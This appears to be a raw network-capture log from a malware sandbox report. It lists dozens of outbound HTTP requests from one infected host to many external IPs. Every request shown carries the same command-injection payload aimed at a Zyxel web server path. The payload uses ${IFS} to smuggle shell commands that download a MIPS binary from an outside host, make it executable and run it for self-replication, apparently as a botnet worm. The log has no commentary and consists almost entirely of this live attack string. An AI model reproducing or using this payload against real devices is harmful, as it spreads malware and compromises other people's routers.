                                            Feb 2, 2024 06:20:58.355036974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            598192.168.2.1535956101.73.93.50443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.355071068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            599192.168.2.153924498.67.125.159443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.355122089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            600192.168.2.154003665.169.3.210443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.355144024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            601192.168.2.1555628141.108.153.121443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.355166912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            602192.168.2.1533248103.34.50.151443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.355192900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            603192.168.2.154194449.171.104.123443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.355253935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            604192.168.2.1547924173.175.105.184443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.355293036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            605192.168.2.1552414213.46.200.113443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.355329037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            606192.168.2.1559376122.194.97.55443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.355366945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            607192.168.2.154697092.126.9.131443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.355413914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            608192.168.2.15608768.162.142.78443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.355451107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            609192.168.2.1553786114.240.150.100443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.355492115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            610192.168.2.1536888101.155.194.13443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.355520964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            611192.168.2.1533198207.86.200.116443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.355552912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            612192.168.2.1553634220.20.190.97443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.355580091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            613192.168.2.1545128119.158.143.158443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.355609894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            614192.168.2.154225254.50.68.195443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.355638027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            615192.168.2.1545288196.162.242.230443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.355669022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            616192.168.2.154997613.167.147.209443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.355716944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            617192.168.2.1557044180.184.252.122443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.355753899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            618192.168.2.1543038197.223.195.219443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.355784893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            619192.168.2.1542316160.255.58.13443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.355823040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            620192.168.2.1556042154.2.166.87443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.355855942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            621192.168.2.155914085.108.33.246443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.355900049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            622192.168.2.154179239.118.205.17443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.355937004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            623192.168.2.1559444115.89.220.101443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.355962992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            624192.168.2.156070812.83.247.102443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.356007099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            625192.168.2.1534668122.170.228.64443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.356067896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            626192.168.2.154455483.34.190.149443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.356086969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            627192.168.2.155150036.146.204.11443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.356142044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            628192.168.2.154322448.191.255.8443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.356163979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            629192.168.2.155896270.85.14.72443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.356213093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            630192.168.2.155579223.113.97.223443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.356268883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            631192.168.2.1547700103.16.119.148443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.356313944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            632192.168.2.154206894.67.95.52443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.356359959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            633192.168.2.1558482223.145.34.88443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.356405020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            634192.168.2.1535740206.112.253.169443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.356456995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            635192.168.2.1550566180.108.10.56443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.356489897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            636192.168.2.1540230219.52.104.114443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.356518030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            637192.168.2.154792864.124.172.152443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.356556892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            638192.168.2.1550986141.225.242.17443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.356596947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            639192.168.2.1533832121.42.150.215443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.356633902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            640192.168.2.1554924154.157.68.133443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.356664896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            641192.168.2.155476665.227.228.223443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.356715918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            642192.168.2.1556114167.226.108.65443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.356745958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            643192.168.2.1558746137.136.187.175443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.356774092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            644192.168.2.1539808218.106.221.14443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.356816053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            645192.168.2.155154225.253.48.248443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.356838942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            646192.168.2.153484435.160.44.193443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.356887102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            647192.168.2.1560894121.5.91.130443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.356921911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            648192.168.2.1551334115.188.119.42443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.356982946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            649192.168.2.1551364166.238.40.112443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.356995106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            650192.168.2.155035424.201.69.7443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.357048988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            651192.168.2.154108488.194.89.122443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.357068062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            652192.168.2.1556222119.35.128.18443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.357136011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            653192.168.2.154123825.150.120.73443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.357181072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            654192.168.2.154326813.85.255.188443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.357206106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            655192.168.2.155234027.116.219.108443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.357248068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            656192.168.2.1546036176.83.168.63443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.357291937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            657192.168.2.1557902219.252.163.46443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.357323885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            658192.168.2.1536416123.154.22.179443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.357355118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            659192.168.2.154192498.228.113.231443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.357391119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            660192.168.2.155480259.130.250.236443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.357420921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            661192.168.2.1534802105.116.219.150443
                                            TimestampBytes transferredDirectionData
